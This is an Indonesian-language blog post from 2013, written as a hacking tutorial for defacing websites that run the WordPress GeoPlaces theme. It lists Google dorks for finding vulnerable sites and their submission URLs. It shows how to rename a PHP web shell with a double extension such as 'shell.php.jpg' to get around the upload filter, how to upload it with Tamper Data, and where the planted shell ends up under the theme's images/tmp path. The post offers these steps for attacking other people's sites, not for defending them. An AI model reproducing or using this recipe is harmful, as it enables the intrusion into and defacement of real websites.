Cara Deface dengan Upload Shell Vulnerability

Diposting oleh Unknown | 11/15/2013 
Langsung Sikat Bray :)
Dork    :

inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 
- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 

 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 


 

Sumber : http://indocyberarmy.blogspot.com/2013/02/wordpress-geoplaces-themes-shell-upload.html
Label: | 0 komentar

0 komentar:

Posting Komentar

Jangan Nyepam Ya Om :D

Next Prev
Rss: Top
▲Top▲